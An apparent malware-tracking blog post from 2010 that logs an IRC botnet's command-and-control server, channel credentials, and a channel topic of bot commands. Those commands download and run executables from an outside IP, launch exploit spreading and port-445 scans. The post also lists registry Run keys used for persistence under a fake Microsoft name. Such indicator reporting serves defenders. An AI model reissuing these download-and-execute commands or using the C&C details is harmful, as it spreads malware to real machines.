java.KUTLUFAMILY.COM
88.255.104.172:81
Botnet C&C irc
Nick: [00_AUT_XP_1113366]
Username: SP3-899
Joined Channel: #kk with Password ^B^B^B^B
Channel Topic for Channel #kk: ".asc -S -s |.http http://94.76.194.116/k.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/bro.jpg c:\y2b3k2i6x6b9.exe c:\y2b3k2i6x6b9.exe -r -h"
Private Message to Channel #kk: "scan; Trying to get external IP."
Private Message to Channel #xs: "HTTP SET http://94.76.194.116/k.exe"
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads."
Private Message to Channel #kk: "scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Startup
HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe
HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\policies\Explorer\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe
Tuesday, June 29, 2010
java.KUTLUFAMILY.COM
Posted by Role at 10:02 PM
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment